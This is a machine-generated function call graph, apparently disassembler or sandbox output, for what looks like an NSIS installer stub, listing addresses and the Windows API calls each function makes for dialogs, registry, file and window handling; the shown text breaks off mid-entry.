SetFileTime 3394->3395 3397 4018c1 FindCloseChangeNotification 3394->3397 3395->3397 3396->3386 3398 4018d2 3397->3398 3397->3408 3399 4018d7 3398->3399 3400 4018ea 3398->3400 3401 40618a 17 API calls 3399->3401 3402 40618a 17 API calls 3400->3402 3403 4018df lstrcatA 3401->3403 3404 4018f2 3402->3404 3403->3404 3406 405813 MessageBoxIndirectA 3404->3406 3405->3386 3406->3408 3407->3390 3407->3408 3410 402bda 3409->3410 3411 40618a 17 API calls 3410->3411 3412 402bfb 3411->3412 3413 402c07 3412->3413 3414 4063d2 5 API calls 3412->3414 3413->3372 3414->3413 3415->3386 3416->3378 3417->3377 3535 401959 3536 402bac 17 API calls 3535->3536 3537 401960 3536->3537 3538 402bac 17 API calls 3537->3538 3539 40196d 3538->3539 3540 402bce 17 API calls 3539->3540 3541 401984 lstrlenA 3540->3541 3543 401994 3541->3543 3542 4019d4 3543->3542 3547 4060f7 lstrcpynA 3543->3547 3545 4019c4 3545->3542 3546 4019c9 lstrlenA 3545->3546 3546->3542 3547->3545 3548 40535c 3549 405507 3548->3549 3550 40537e GetDlgItem GetDlgItem GetDlgItem 3548->3550 3552 40550f GetDlgItem CreateThread CloseHandle 3549->3552 3555 405537 3549->3555 3593 4041b0 SendMessageA 3550->3593 3552->3555 3553 4053ee 3560 4053f5 GetClientRect GetSystemMetrics SendMessageA SendMessageA 3553->3560 3554 405565 3558 4055c0 3554->3558 3562 405575 3554->3562 3563 405599 ShowWindow 3554->3563 3555->3554 3556 405586 3555->3556 3557 40554d ShowWindow ShowWindow 3555->3557 3559 4041e2 8 API calls 3556->3559 3595 4041b0 SendMessageA 3557->3595 3558->3556 3569 4055cd SendMessageA 3558->3569 3564 405592 3559->3564 3567 405463 3560->3567 3568 405447 SendMessageA SendMessageA 3560->3568 3596 404154 3562->3596 3565 4055b9 3563->3565 3566 4055ab 3563->3566 3572 404154 SendMessageA 3565->3572 3571 40521e 24 API calls 3566->3571 3573 405476 3567->3573 3574 405468 SendMessageA 3567->3574 3568->3567 3569->3564 3575 4055e6 CreatePopupMenu 3569->3575 3571->3565 3572->3558 3577 40417b 18 API calls 3573->3577 3574->3573 3576 40618a 17 API calls 3575->3576 3578 4055f6 AppendMenuA 3576->3578 3579 405486 3577->3579 3580 405614 GetWindowRect 3578->3580 3581 405627 TrackPopupMenu 3578->3581 3582 4054c3 GetDlgItem SendMessageA 3579->3582 3583 40548f ShowWindow 3579->3583 3580->3581 3581->3564 3584 405643 3581->3584 3582->3564 3587 4054ea SendMessageA SendMessageA 3582->3587 3585 4054b2 3583->3585 3586 4054a5 ShowWindow 3583->3586 3588 405662 SendMessageA 3584->3588 3594 4041b0 SendMessageA 3585->3594 3586->3585 3587->3564 3588->3588 3589 40567f OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3588->3589 3591 4056a1 SendMessageA 3589->3591 3591->3591 3592 4056c3 GlobalUnlock SetClipboardData CloseClipboard 3591->3592 3592->3564 3593->3553 3594->3582 3595->3554 3597 404161 SendMessageA 3596->3597 3598 40415b 3596->3598 3597->3556 3598->3597 3599 40275d 3600 402763 3599->3600 3601 402a5a 3600->3601 3602 40276b FindClose 3600->3602 3602->3601 3603 40495e 3604 40498a 3603->3604 3605 40496e 3603->3605 3607 404990 SHGetPathFromIDListA 3604->3607 3608 4049bd 3604->3608 3614 4057f7 GetDlgItemTextA 3605->3614 3610 4049a0 3607->3610 3611 4049a7 SendMessageA 3607->3611 3609 40497b SendMessageA 3609->3604 3612 40140b 2 API calls 3610->3612 3611->3608 3612->3611 3614->3609 3615 401a5e 3616 402bac 17 API calls 3615->3616 3617 401a67 3616->3617 3618 402bac 17 API calls 3617->3618 3619 401a0e 3618->3619 3620 4029de 3621 406500 5 API calls 3620->3621 3622 4029e5 3621->3622 3623 402bce 17 API calls 3622->3623 3624 4029ee 3623->3624 3626 402a2a 3624->3626 3630 40614a 3624->3630 3627 4029fc 3627->3626 3634 406134 3627->3634 3631 406155 3630->3631 3632 406178 IIDFromString 3631->3632 3633 406171 3631->3633 3632->3627 3633->3627 3637 406119 WideCharToMultiByte 3634->3637 3636 402a1d CoTaskMemFree 3636->3626 3637->3636 3638 4027df 3639 402bce 17 API calls 3638->3639 3641 4027ed 3639->3641 3640 402803 3643 405c6b 2 API calls 3640->3643 3641->3640 3642 402bce 17 API calls 3641->3642 3642->3640 3644 402809 3643->3644 3666 405c90 GetFileAttributesA CreateFileA 3644->3666 3646 402816 3647 402822 GlobalAlloc 3646->3647 3648 4028bf 3646->3648 3649 4028b6 CloseHandle 3647->3649 3650 40283b 3647->3650 3651 4028c7 DeleteFileA 3648->3651 3652 4028da 3648->3652 3649->3648 3667 403300 SetFilePointer 3650->3667 3651->3652 3654 402841 3655 4032ea ReadFile 3654->3655 3656 40284a GlobalAlloc 3655->3656 3657 402894 3656->3657 3658 40285a 3656->3658 3659 405d37 WriteFile 3657->3659 3660 4030d8 31 API calls 3658->3660 3661 4028a0 GlobalFree 3659->3661 3663 402867 3660->3663 3662 4030d8 31 API calls 3661->3662 3664 4028b3 3662->3664 3665 40288b GlobalFree 3663->3665 3664->3649 3665->3657 3666->3646 3667->3654 3668 4023e0 3669 402bce 17 API calls 3668->3669 3670 4023f1 3669->3670 3671 402bce 17 API calls 3670->3671 3672 4023fa 3671->3672 3673 402bce 17 API calls 3672->3673 3674 402404 GetPrivateProfileStringA 3673->3674 3675 4028e0 3676 402bac 17 API calls 3675->3676 3677 4028e6 3676->3677 3678 402925 3677->3678 3679 40290e 3677->3679 3684 4027bf 3677->3684 3682 40293f 3678->3682 3683 40292f 3678->3683 3680 402922 3679->3680 3681 402913 3679->3681 3680->3684 3690 406055 wsprintfA 3680->3690 3689 4060f7 lstrcpynA 3681->3689 3686 40618a 17 API calls 3682->3686 3685 402bac 17 API calls 3683->3685 3685->3680 3686->3680 3689->3684 3690->3684 3691 401b63 3692 402bce 17 API calls 3691->3692 3693 401b6a 3692->3693 3694 402bac 17 API calls 3693->3694 3695 401b73 wsprintfA 3694->3695 3696 402a5a 3695->3696 3697 401d65 3698 401d78 GetDlgItem 3697->3698 3699 401d6b 3697->3699 3701 401d72 3698->3701 3700 402bac 17 API calls 3699->3700 3700->3701 3702 401db9 GetClientRect LoadImageA SendMessageA 3701->3702 3703 402bce 17 API calls 3701->3703 3705 401e1a 3702->3705 3707 401e26 3702->3707 3703->3702 3706 401e1f DeleteObject 3705->3706 3705->3707 3706->3707 3708 4042e6 3709 4042fc 3708->3709 3714 404408 3708->3714 3712 40417b 18 API calls 3709->3712 3710 404477 3711 404541 3710->3711 3713 404481 GetDlgItem 3710->3713 3720 4041e2 8 API calls 3711->3720 3715 404352 3712->3715 3716 404497 3713->3716 3717 4044ff 3713->3717 3714->3710 3714->3711 3718 40444c GetDlgItem SendMessageA 3714->3718 3719 40417b 18 API calls 3715->3719 3716->3717 3724 4044bd SendMessageA LoadCursorA SetCursor 3716->3724 3717->3711 3721 404511 3717->3721 3741 40419d EnableWindow 3718->3741 3723 40435f CheckDlgButton 3719->3723 3731 40453c 3720->3731 3726 404517 SendMessageA 3721->3726 3727 404528 3721->3727 3739 40419d EnableWindow 3723->3739 3745 40458a 3724->3745 3726->3727 3727->3731 3732 40452e SendMessageA 3727->3732 3728 404472 3742 404566 3728->3742 3732->3731 3734 40437d GetDlgItem 3740 4041b0 SendMessageA 3734->3740 3736 404393 SendMessageA 3737 4043b1 GetSysColor 3736->3737 3738 4043ba SendMessageA SendMessageA lstrlenA SendMessageA SendMessageA 3736->3738 3737->3738 3738->3731 3739->3734 3740->3736 3741->3728 3743 404574 3742->3743 3744 404579 SendMessageA 3742->3744 3743->3744 3744->3710 3748 4057d9 ShellExecuteExA 3745->3748 3747 4044f0 LoadCursorA SetCursor 3747->3717 3748->3747 3749 40166a 3750 402bce 17 API calls 3749->3750 3751 401671 3750->3751 3752 402bce 17 API calls 3751->3752 3753 40167a 3752->3753 3754 402bce 17 API calls 3753->3754 3755 401683 MoveFileA 3754->3755 3756 401696 3755->3756 3757 40168f 3755->3757 3758 40646b 2 API calls 3756->3758 3761 4022e2 3756->3761 3759 401423 24 API calls 3757->3759 3760 4016a5 3758->3760 3759->3761 3760->3761 3762 405ed6 36 API calls 3760->3762 3762->3757 3763 40216b 3764 402bce 17 API calls 3763->3764 3765 402172 3764->3765 3766 402bce 17 API calls 3765->3766 3767 40217c 3766->3767 3768 402bce 17 API calls 3767->3768 3769 402186 3768->3769 3770 402bce 17 API calls 3769->3770 3771 402193 3770->3771 3772 402bce 17 API calls 3771->3772 3773 40219d 3772->3773 3774 4021df CoCreateInstance 3773->3774 3775 402bce 17 API calls 3773->3775 3778 4021fe 3774->3778 3780 4022ac 3774->3780 3775->3774 3776 401423 24 API calls 3777 4022e2 3776->3777 3779 40228c MultiByteToWideChar 3778->3779 3778->3780 3779->3780 3780->3776 3780->3777 3781 4022eb 3782 402bce 17 API calls 3781->3782 3783 4022f1 3782->3783 3784 402bce 17 API calls 3783->3784 3785 4022fa 3784->3785 3786 402bce 17 API calls 3785->3786 3787 402303 3786->3787 3788 40646b 2 API calls 3787->3788 3789 40230c 3788->3789 3790 40231d lstrlenA lstrlenA 3789->3790 3794 402310 3789->3794 3792 40521e 24 API calls 3790->3792 3791 40521e 24 API calls 3795 402318 3791->3795 3793 402359 SHFileOperationA 3792->3793 3793->3794 3793->3795 3794->3791 3794->3795 3796 40236d 3797 402374 3796->3797 3801 402387 3796->3801 3798 40618a 17 API calls 3797->3798 3799 402381 3798->3799 3800 405813 MessageBoxIndirectA 3799->3800 3800->3801 3802 40266d 3803 402bac 17 API calls 3802->3803 3804 402677 3803->3804 3805 405d08 ReadFile 3804->3805 3806 4026e7 3804->3806 3808 4026f7 3804->3808 3810 4026e5 3804->3810 3805->3804 3811 406055 wsprintfA 3806->3811 3809 40270d SetFilePointer 3808->3809 3808->3810 3809->3810 3811->3810 3812 4019ed 3813 402bce 17 API calls 3812->3813 3814 4019f4 3813->3814 3815 402bce 17 API calls 3814->3815 3816 4019fd 3815->3816 3817 401a04 lstrcmpiA 3816->3817 3818 401a16 lstrcmpA 3816->3818 3819 401a0a 3817->3819 3818->3819 3820 40296e 3821 402bac 17 API calls 3820->3821 3822 402974 3821->3822 3823 4029af 3822->3823 3825 4027bf 3822->3825 3826 402986 3822->3826 3824 40618a 17 API calls 3823->3824 3823->3825 3824->3825 3826->3825 3828 406055 wsprintfA 3826->3828 3828->3825 3829 4014f4 SetForegroundWindow 3830 402a5a 3829->3830 3831 402476 3832 402bce 17 API calls 3831->3832 3833 402488 3832->3833 3834 402bce 17 API calls 3833->3834 3835 402492 3834->3835 3848 402c5e 3835->3848 3838 402a5a 3839 4024c7 3841 4024d3 3839->3841 3844 402bac 17 API calls 3839->3844 3840 402bce 17 API calls 3843 4024c0 lstrlenA 3840->3843 3842 4024f5 RegSetValueExA 3841->3842 3845 4030d8 31 API calls 3841->3845 3846 40250b RegCloseKey 3842->3846 3843->3839 3844->3841 3845->3842 3846->3838 3849 402c79 3848->3849 3852 405fab 3849->3852 3853 405fba 3852->3853 3854 4024a2 3853->3854 3855 405fc5 RegCreateKeyExA 3853->3855 3854->3838 3854->3839 3854->3840 3855->3854 3856 402777 3857 40277d 3856->3857 3858 402781 FindNextFileA 3857->3858 3860 402793 3857->3860 3859 4027d2 3858->3859 3858->3860 3862 4060f7 lstrcpynA 3859->3862 3862->3860 3863 401ef9 3864 402bce 17 API calls 3863->3864 3865 401eff 3864->3865 3866 402bce 17 API calls 3865->3866 3867 401f08 3866->3867 3868 402bce 17 API calls 3867->3868 3869 401f11 3868->3869 3870 402bce 17 API calls 3869->3870 3871 401f1a 3870->3871 3872 401423 24 API calls 3871->3872 3873 401f21 3872->3873 3880 4057d9 ShellExecuteExA 3873->3880 3875 401f5c 3876 406575 5 API calls 3875->3876 3877 4027bf 3875->3877 3878 401f76 CloseHandle 3876->3878 3878->3877 3880->3875 3422 401f7b 3423 402bce 17 API calls 3422->3423 3424 401f81 3423->3424 3425 40521e 24 API calls 3424->3425 3426 401f8b 3425->3426 3427 405796 2 API calls 3426->3427 3428 401f91 3427->3428 3429 401fb2 CloseHandle 3428->3429 3433 4027bf 3428->3433 3437 406575 WaitForSingleObject 3428->3437 3429->3433 3432 401fa6 3434 401fb4 3432->3434 3435 401fab 3432->3435 3434->3429 3442 406055 wsprintfA 3435->3442 3438 40658f 3437->3438 3439 4065a1 GetExitCodeProcess 3438->3439 3440 40653c 2 API calls 3438->3440 3439->3432 3441 406596 WaitForSingleObject 3440->3441 3441->3438 3442->3429 3881 401ffb 3882 402bce 17 API calls 3881->3882 3883 402002 3882->3883 3884 406500 5 API calls 3883->3884 3885 402011 3884->3885 3886 402029 GlobalAlloc 3885->3886 3887 402091 3885->3887 3886->3887 3888 40203d 3886->3888 3889 406500 5 API calls 3888->3889 3890 402044 3889->3890 3891 406500 5 API calls 3890->3891 3892 40204e 3891->3892 3892->3887 3896 406055 wsprintfA 3892->3896 3894 402085 3897 406055 wsprintfA 3894->3897 3896->3894 3897->3887 3898 4018fd 3899 401934 3898->3899 3900 402bce 17 API calls 3899->3900 3901 401939 3900->3901 3902 4058bf 67 API calls 3901->3902 3903 401942 3902->3903 3904 401000 3905 401037 BeginPaint GetClientRect 3904->3905 3906 40100c DefWindowProcA 3904->3906 3908 4010f3 3905->3908 3911 401179 3906->3911 3909 401073 CreateBrushIndirect FillRect DeleteObject 3908->3909 3910 4010fc 3908->3910 3909->3908 3912 401102 CreateFontIndirectA 3910->3912 3913 401167 EndPaint 3910->3913 3912->3913 3914 401112 6 API calls 3912->3914 3913->3911 3914->3913 3915 401900 3916 402bce 17 API calls 3915->3916 3917 401907 3916->3917 3918 405813 MessageBoxIndirectA 3917->3918 3919 401910 3918->3919 3920 404b80 GetDlgItem GetDlgItem 3921 404bd6 7 API calls 3920->3921 3928 404dfd 3920->3928 3922 404c72 SendMessageA 3921->3922 3923 404c7e DeleteObject 3921->3923 3922->3923 3924 404c89 3923->3924 3926 404cc0 3924->3926 3929 40618a 17 API calls 3924->3929 3925 404edf 3927 404f8b 3925->3927 3937 404f38 SendMessageA 3925->3937 3963 404df0 3925->3963 3930 40417b 18 API calls 3926->3930 3933 404f95 SendMessageA 3927->3933 3934 404f9d 3927->3934 3928->3925 3932 404e6c 3928->3932 3974 404ace SendMessageA 3928->3974 3935 404ca2 SendMessageA SendMessageA 3929->3935 3931 404cd4 3930->3931 3936 40417b 18 API calls 3931->3936 3932->3925 3938 404ed1 SendMessageA 3932->3938 3933->3934 3944 404fb6 3934->3944 3945 404faf ImageList_Destroy 3934->3945 3949 404fc6 3934->3949 3935->3924 3952 404ce5 3936->3952 3942 404f4d SendMessageA 3937->3942 3937->3963 3938->3925 3939 4041e2 8 API calls 3943 40518b 3939->3943 3941 40513f 3950 405151 ShowWindow GetDlgItem ShowWindow 3941->3950 3941->3963 3948 404f60 3942->3948 3946 404fbf GlobalFree 3944->3946 3944->3949 3945->3944 3946->3949 3947 404dbf GetWindowLongA SetWindowLongA 3951 404dd8 3947->3951 3957 404f71 SendMessageA 3948->3957 3949->3941 3967 405001 3949->3967 3979 404b4e 3949->3979 3950->3963 3953 404df5 3951->3953 3954 404ddd ShowWindow 3951->3954 3952->3947 3956 404d37 SendMessageA 3952->3956 3958 404dba 3952->3958 3960 404d75 SendMessageA 3952->3960 3961 404d89 SendMessageA 3952->3961 3973 4041b0 SendMessageA 3953->3973 3972 4041b0 SendMessageA 3954->3972 3956->3952 3957->3927 3958->3947 3958->3951 3960->3952 3961->3952 3963->3939 3964 40510b 3965 405115 InvalidateRect 3964->3965 3968 405121 3964->3968 3965->3968 3966 40502f SendMessageA 3969 405045 3966->3969 3967->3966 3967->3969 3968->3941 3988 404a89 3968->3988 3969->3964 3971 4050b9 SendMessageA SendMessageA 3969->3971 3971->3969 3972->3963 3973->3928 3975 404af1 GetMessagePos ScreenToClient SendMessageA 3974->3975 3976 404b2d SendMessageA 3974->3976 3977 404b25 3975->3977 3978 404b2a 3975->3978 3976->3977 3977->3932 3978->3976 3991 4060f7 lstrcpynA 3979->3991 3981 404b61 3992 406055 wsprintfA 3981->3992 3983 404b6b 3984 40140b 2 API calls 3983->3984 3985 404b74 3984->3985 3993 4060f7 lstrcpynA 3985->3993 3987 404b7b 3987->3967 3994 4049c4 3988->3994 3990 404a9e 3990->3941 3991->3981 3992->3983 3993->3987 3995 4049da 3994->3995 3996 40618a 17 API calls 3995->3996 3997 404a3e 3996->3997 3998 40618a 17 API calls 3997->3998 3999 404a49 3998->3999 4000 40618a 17 API calls 3999->4000 4001 404a5f lstrlenA wsprintfA SetDlgItemTextA 4000->4001 4001->3990 4002 401502 4003 40150a 4002->4003 4005 40151d 4002->4005 4004 402bac 17 API calls 4003->4004 4004->4005 4006 402604 4007 402bce 17 API calls 4006->4007 4008 40260b 4007->4008 4011 405c90 GetFileAttributesA CreateFileA 4008->4011 4010 402617 4011->4010 4012 401b87 4013 401b94 4012->4013 4014 401bd8 4012->4014 4015 401c1c 4013->4015 4020 401bab 4013->4020 4016 401c01 GlobalAlloc 4014->4016 4017 401bdc 4014->4017 4018 40618a 17 API calls 4015->4018 4026 402387 4015->4026 4019 40618a 17 API calls 4016->4019 4017->4026 4033 4060f7 lstrcpynA 4017->4033 4022 402381 4018->4022 4019->4015 4031 4060f7 lstrcpynA 4020->4031 4027 405813 MessageBoxIndirectA 4022->4027 4024 401bee GlobalFree 4024->4026 4025 401bba 4032 4060f7 lstrcpynA 4025->4032 4027->4026 4029 401bc9 4034 4060f7 lstrcpynA 4029->4034 4031->4025 4032->4029 4033->4024 4034->4026 4035 402588 4045 402c0e 4035->4045 4038 402bac 17 API calls 4039 40259b 4038->4039 4040 4027bf 4039->4040 4041 4025c2 RegEnumValueA 4039->4041 4042 4025b6 RegEnumKeyA 4039->4042 4043 4025d7 RegCloseKey 4041->4043 4042->4043 4043->4040 4046 402bce 17 API calls 4045->4046 4047 402c25 4046->4047 4048 405f7d RegOpenKeyExA 4047->4048 4049 402592 4048->4049 4049->4038 3418 401389 3420 401390 3418->3420 3419 4013fe 3420->3419 3421 4013cb MulDiv SendMessageA 3420->3421 3421->3420 4050 40460d 4051 404639 4050->4051 4052 40464a 4050->4052 4111 4057f7 GetDlgItemTextA 4051->4111 4054 404656 GetDlgItem 4052->4054 4087 4046b5 4052->4087 4058 40466a 4054->4058 4055 404644 4057 4063d2 5 API calls 4055->4057 4056 404799 4059 404943 4056->4059 4113 4057f7 GetDlgItemTextA 4056->4113 4057->4052 4061 40467e SetWindowTextA 4058->4061 4066 405b28 4 API calls 4058->4066 4065 4041e2 8 API calls 4059->4065 4064 40417b 18 API calls 4061->4064 4062 4047c9 4067 405b7d 18 API calls 4062->4067 4063 40618a 17 API calls 4068 404729 SHBrowseForFolderA 4063->4068 4069 40469a 4064->4069 4070 404957 4065->4070 4071 404674 4066->4071 4072 4047cf 4067->4072 4068->4056 4073 404741 CoTaskMemFree 4068->4073 4074 40417b 18 API calls 4069->4074 4071->4061 4075 405a8f 3 API calls 4071->4075 4114 4060f7 lstrcpynA 4072->4114 4076 405a8f 3 API calls 4073->4076 4077 4046a8 4074->4077 4075->4061 4078 40474e 4076->4078 4112 4041b0 SendMessageA 4077->4112 4081 404785 SetDlgItemTextA 4078->4081 4086 40618a 17 API calls 4078->4086 4081->4056 4082 4046ae 4084 406500 5 API calls 4082->4084 4083 4047e6 4085 406500 5 API calls 4083->4085 4084->4087 4094 4047ed 4085->4094 4088 40476d lstrcmpiA 4086->4088 4087->4056 4087->4059 4087->4063 4088->4081 4091 40477e lstrcatA 4088->4091 4089 404829 4115 4060f7 lstrcpynA 4089->4115 4091->4081 4092 404830 4093 405b28 4 API calls 4092->4093 4095 404836 GetDiskFreeSpaceA 4093->4095 4094->4089 4097 405ad6 2 API calls 4094->4097 4099 404881 4094->4099 4098 40485a MulDiv 4095->4098 4095->4099 4097->4094 4098->4099 4100 4048f2 4099->4100 4101 404a89 20 API calls 4099->4101 4102 404915 4100->4102 4103 40140b 2 API calls 4100->4103 4104 4048df 4101->4104 4116 40419d EnableWindow 4102->4116 4103->4102 4106 4048f4 SetDlgItemTextA 4104->4106 4107 4048e4 4104->4107 4106->4100 4109 4049c4 20 API calls 4107->4109 4108 404931 4108->4059 4110 404566 SendMessageA 4108->4110 4109->4100 4110->4059 4111->4055 4112->4082 4113->4062 4114->4083 4115->4092 4116->4108 4117 401490 4118 40521e 24 API calls 4117->4118 4119 401497 4118->4119 4120 405192 4121 4051a2 4120->4121 4122 4051b6 4120->4122 4124 4051ff 4121->4124 4125 4051a8 4121->4125 4123 4051be IsWindowVisible 4122->4123 4131 4051d5 4122->4131 4123->4124 4126 4051cb 4123->4126 4127 405204 CallWindowProcA 4124->4127 4128 4041c7 SendMessageA 4125->4128 4130 404ace 5 API calls 4126->4130 4129 4051b2 4127->4129 4128->4129 4130->4131 4131->4127 4132 404b4e 4 API calls 4131->4132 4132->4124 4133 402516 4134 402c0e 17 API calls 4133->4134 4135 402520 4134->4135 4136 402bce 17 API calls 4135->4136 4137 402529 4136->4137 4138 402533 RegQueryValueExA 4137->4138 4142 4027bf 4137->4142 4139 402559 RegCloseKey 4138->4139 4140 402553 4138->4140 4139->4142 4140->4139 4144 406055 wsprintfA 4140->4144 4144->4139 4145 40239c 4146 4023a4 4145->4146 4147 4023aa 4145->4147 4148 402bce 17 API calls 4146->4148 4149 402bce 17 API calls 4147->4149 4151 4023ba 4147->4151 4148->4147 4149->4151 4150 4023c8 4153 402bce 17 API calls 4150->4153 4151->4150 4152 402bce 17 API calls 4151->4152 4152->4150 4154 4023d1 WritePrivateProfileStringA 4153->4154 4155 40149d 4156 402387 4155->4156 4157 4014ab PostQuitMessage 4155->4157 4157->4156 4158 40159d 4159 402bce 17 API calls 4158->4159 4160 4015a4 SetFileAttributesA 4159->4160 4161 4015b6 4160->4161 4162 40209d 4163 40215d 4162->4163 4164 4020af 4162->4164 4167 401423 24 API calls 4163->4167 4165 402bce 17 API calls 4164->4165 4166 4020b6 4165->4166 4168 402bce 17 API calls 4166->4168 4172 4022e2 4167->4172 4169 4020bf 4168->4169 4170 4020d4 LoadLibraryExA 4169->4170 4171 4020c7 GetModuleHandleA 4169->4171 4170->4163 4173 4020e4 GetProcAddress 4170->4173 4171->4170 4171->4173 4174 402130 4173->4174 4175 4020f3 4173->4175 4176 40521e 24 API calls 4174->4176 4177 402103 4175->4177 4178 401423 24 API calls 4175->4178 4176->4177 4177->4172 4179 402151 FreeLibrary 4177->4179 4178->4177 4179->4172 4180 401a1e 4181 402bce 17 API calls 4180->4181 4182 401a27 ExpandEnvironmentStringsA 4181->4182 4183 401a3b 4182->4183 4185 401a4e 4182->4185 4184 401a40 lstrcmpA 4183->4184 4183->4185 4184->4185 4191 40171f 4192 402bce 17 API calls 4191->4192 4193 401726 SearchPathA 4192->4193 4194 401741 4193->4194 4195 401d1f 4196 402bac 17 API calls 4195->4196 4197 401d26 4196->4197 4198 402bac 17 API calls 4197->4198 4199 401d32 GetDlgItem 4198->4199 4200 402620 4199->4200 4201 402421 4202 402453 4201->4202 4203 402428 4201->4203 4204 402bce 17 API calls 4202->4204 4205 402c0e 17 API calls 4203->4205 4206 40245a 4204->4206 4207 40242f 4205->4207 4212 402c8c 4206->4212 4209 402467 4207->4209 4210 402bce 17 API calls 4207->4210 4211 402440 RegDeleteValueA RegCloseKey 4210->4211 4211->4209 4213 402c98 4212->4213 4214 402c9f 4212->4214 4213->4209 4214->4213 4216 402cd0 4214->4216 4217 405f7d RegOpenKeyExA 4216->4217 4219 402cfe 4217->4219 4218 402da8 4218->4213 4219->4218 4220 402d0e RegEnumValueA 4219->4220 4224 402d31 4219->4224 4221 402d98 RegCloseKey 4220->4221 4220->4224 4221->4218 4222 402d6d RegEnumKeyA 4223 402d76 RegCloseKey 4222->4223 4222->4224 4225 406500 5 API calls 4223->4225 4224->4221 4224->4222 4224->4223 4227 402cd0 6 API calls 4224->4227 4226 402d86 4225->4226 4226->4218 4228 402d8a RegDeleteKeyA 4226->4228 4227->4224 4228->4218 4229 4027a1 4230 402bce 17 API calls 4229->4230 4231 4027a8 FindFirstFileA 4230->4231 4232 4027cb 4231->4232 4236 4027bb 4231->4236 4233 4027d2 4232->4233 4237 406055 wsprintfA 4232->4237 4238 4060f7 lstrcpynA 4233->4238 4237->4233 4238->4236 4239 402626 4240 40262b 4239->4240 4241 40263f 4239->4241 4242 402bac 17 API calls 4240->4242 4243 402bce 17 API calls 4241->4243 4245 402634 4242->4245 4244 402646 lstrlenA 4243->4244 4244->4245 4246 402668 4245->4246 4247 405d37 WriteFile 4245->4247 4247->4246 4248 403ca7 4249 403dfa 4248->4249 4250 403cbf 4248->4250 4252 403e4b 4249->4252 4253 403e0b GetDlgItem GetDlgItem 4249->4253 4250->4249 4251 403ccb 4250->4251 4254 403cd6 SetWindowPos 4251->4254 4255 403ce9 4251->4255 4257 403ea5 4252->4257 4265 401389 2 API calls 4252->4265 4256 40417b 18 API calls 4253->4256 4254->4255 4259 403d06 4255->4259 4260 403cee ShowWindow 4255->4260 4261 403e35 SetClassLongA 4256->4261 4258 4041c7 SendMessageA 4257->4258 4278 403df5 4257->4278 4287 403eb7 4258->4287 4262 403d28 4259->4262 4263 403d0e DestroyWindow 4259->4263 4260->4259 4264 40140b 2 API calls 4261->4264 4266 403d2d SetWindowLongA 4262->4266 4267 403d3e 4262->4267 4316 404104 4263->4316 4264->4252 4268 403e7d 4265->4268 4266->4278 4271 403db5 4267->4271 4272 403d4a GetDlgItem 4267->4272 4268->4257 4273 403e81 SendMessageA 4268->4273 4269 40140b 2 API calls 4269->4287 4270 404106 DestroyWindow EndDialog 4270->4316 4274 4041e2 8 API calls 4271->4274 4276 403d7a 4272->4276 4277 403d5d SendMessageA IsWindowEnabled 4272->4277 4273->4278 4274->4278 4275 404135 ShowWindow 4275->4278 4280 403d87 4276->4280 4281 403dce SendMessageA 4276->4281 4282 403d9a 4276->4282 4290 403d7f 4276->4290 4277->4276 4277->4278 4279 40618a 17 API calls 4279->4287 4280->4281 4280->4290 4281->4271 4285 403da2 4282->4285 4286 403db7 4282->4286 4283 404154 SendMessageA 4283->4271 4284 40417b 18 API calls 4284->4287 4288 40140b 2 API calls 4285->4288 4289 40140b 2 API calls 4286->4289 4287->4269 4287->4270 4287->4278 4287->4279 4287->4284 4291 40417b 18 API calls 4287->4291 4307 404046 DestroyWindow 4287->4307 4288->4290 4289->4290 4290->4271 4290->4283 4292 403f32 GetDlgItem 4291->4292 4293 403f47 4292->4293 4294 403f4f ShowWindow EnableWindow 4292->4294 4293->4294 4317 40419d EnableWindow 4294->4317 4296 403f79 EnableWindow 4301 403f8d 4296->4301 4297 403f92 GetSystemMenu EnableMenuItem SendMessageA 4298 403fc2 SendMessageA 4297->4298 4297->4301 4298->4301 4300 403c88 18 API calls 4300->4301 4301->4297 4301->4300 4318 4041b0 SendMessageA 4301->4318 4319 4060f7 lstrcpynA 4301->4319 4303 403ff1 lstrlenA 4304 40618a 17 API calls 4303->4304 4305 404002 SetWindowTextA 4304->4305 4306 401389 2 API calls 4305->4306 4306->4287 4308 404060 CreateDialogParamA 4307->4308 4307->4316 4309 404093 4308->4309 4308->4316 4310 40417b 18 API calls 4309->4310 4311 40409e GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4310->4311 4312 401389 2 API calls 4311->4312 4313 4040e4 4312->4313 4313->4278 4314 4040ec ShowWindow 4313->4314 4315 4041c7 SendMessageA 4314->4315 4315->4316 4316->4275 4316->4278 4317->4296 4318->4301 4319->4303 4320 40272b 4321 402732 4320->4321 4323 4029aa 4320->4323 4322 402bac 17 API calls 4321->4322 4324 402739 4322->4324 4325 402748 SetFilePointer 4324->4325 4325->4323 4326 402758 4325->4326 4328 406055 wsprintfA 4326->4328 4328->4323 4329 401c2e 4330 402bac 17 API calls 4329->4330 4331 401c35 4330->4331 4332 402bac 17 API calls 4331->4332 4333 401c42 4332->4333 4334 402bce 17 API calls 4333->4334 4338 401c57 4333->4338 4334->4338 4335 401c67 4336 401c72 4335->4336 4337 401cbe 4335->4337 4340 402bac 17 API calls 4336->4340 4341 402bce 17 API calls 4337->4341 4338->4335 4339 402bce 17 API calls 4338->4339 4339->4335 4342 401c77 4340->4342 4343 401cc3 4341->4343 4344 402bac 17 API calls 4342->4344 4345 402bce 17 API calls 4343->4345 4346 401c83 4344->4346 4347 401ccc FindWindowExA 4345->4347 4348 401c90 SendMessageTimeoutA 4346->4348 4349 401cae SendMessageA 4346->4349 4350 401cea 4347->4350 4348->4350 4349->4350 2884 403830 2885 403848 2884->2885 2886 40383a CloseHandle 2884->2886 2891 403875 2885->2891 2886->2885 2892 403883 2891->2892 2893 403888 FreeLibrary GlobalFree 2892->2893 2894 40384d 2892->2894 2893->2893 2893->2894 2895 4058bf 2894->2895 2932 405b7d 2895->2932 2898 4058e7 DeleteFileA 2900 403859 2898->2900 2899 4058fe 2901 405a2c 2899->2901 2947 4060f7 lstrcpynA 2899->2947 2901->2900 2980 40646b FindFirstFileA 2901->2980 2903 405924 2904 405937 2903->2904 2905 40592a lstrcatA 2903->2905 2948 405ad6 lstrlenA 2904->2948 2906 40593d 2905->2906 2909 40594b lstrcatA 2906->2909 2911 405956 lstrlenA FindFirstFileA 2906->2911 2909->2911 2911->2901 2928 40597a 2911->2928 2915 405877 5 API calls 2916 405a66 2915->2916 2917 405a80 2916->2917 2918 405a6a 2916->2918 2920 40521e 24 API calls 2917->2920 2918->2900 2922 40521e 24 API calls 2918->2922 2920->2900 2921 405a0b FindNextFileA 2923 405a23 FindClose 2921->2923 2921->2928 2924 405a77 2922->2924 2923->2901 2925 405ed6 36 